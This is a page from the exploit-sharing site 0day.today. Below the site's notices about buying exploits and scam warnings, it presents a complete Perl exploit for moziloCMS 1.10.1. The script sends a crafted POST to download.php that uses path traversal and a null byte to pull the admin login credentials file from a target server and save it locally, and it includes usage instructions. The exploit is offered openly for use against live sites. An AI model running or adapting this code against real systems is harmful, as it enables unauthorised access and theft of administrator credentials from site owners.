0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit
=============================================================== moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit =============================================================== #!/usr/bin/perl # # moziloCMS 1.10.1 Perl exploit # # discovered & written by Ams # # DESCRIPTION: # Vulnerability hides in "download.php", which we can use to download any file we want to. # Here, for example, "admin/conf/logindata.conf". (Btw, not very smart solution to keep it open # not looking on that it is protected by .htaccess) # Script does not filters global params, it only checks whether local file exists... # (By the way, all downloads are logged to "/conf/downloads.conf") # # USAGE: # Run exploit :perl expl.pl http://www.site.com # # NEEDED: # magic_quotes_gpc = off # use strict; use IO::Socket; print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n\t\t moziloCMS 1.10.1 exploit (by Ams) \n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; if(@ARGV<1){ die "\n\tUsage:\texpl.pl [host]\n\n \n\tExample:\texpl.pl http://localhost/blog/\n\n"; } my $expl_url = $ARGV[0]; print "\n\t[~] Starting exploit...\n"; if($expl_url =~ m#http://#) { exploit($expl_url); } else { exploit('http://'.$expl_url); } sub exploit { # Defining vars. my $site = pop @_; my ($a, $b, $c, @d) = split /\//,$site; my $path = join('/',@d); my $host = $c; if($path) {$path = '/'.$path;} my ($length, $packet, $downloaded, $injection); # Revealing /data/sess.php. print "\n\t[~] Sending request to 'downloads.php'...\n"; $injection = "file=hola&cat=../admin/conf/logindata.conf%00"; $length = length($injection); $packet = "POST $path/download.php HTTP/1.1\r\n"; $packet .= "Host: $host\r\n"; $packet .= "Connection: Close\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: $length\r\n\r\n"; $packet .= "$injection"; $downloaded = send_surprise($host, $packet, 1); if($downloaded =~ /hackin/) { print "\n\t[-] Exploiting failed...\n"; } elsif ($downloaded =~ /200 OK/) { # Parsing and saving received data. $downloaded =~ /\r\n\r\n/ ; $downloaded = $'; open(DOWNL, ">hola.txt"); print DOWNL $downloaded; close(DOWNL); print "\n\t[+] Looks like ok! Check hola.txt\n"; } else { print "\n\t[-] Exploiting failed...\n"; } } sub send_surprise() { my $dat = 1; my ($host, $packet, $ret) = @_; my $socket=IO::Socket::INET->new( Proto=>"tcp", PeerAddr=>$host, PeerPort=>"80" ); if( ! $socket) { return 0; } else { print $socket $packet; if($ret) { my $rcv; while($rcv = <$socket>) { $dat .= $rcv; } } close ($socket); return $dat; } } # 0day.today [2024-11-15] #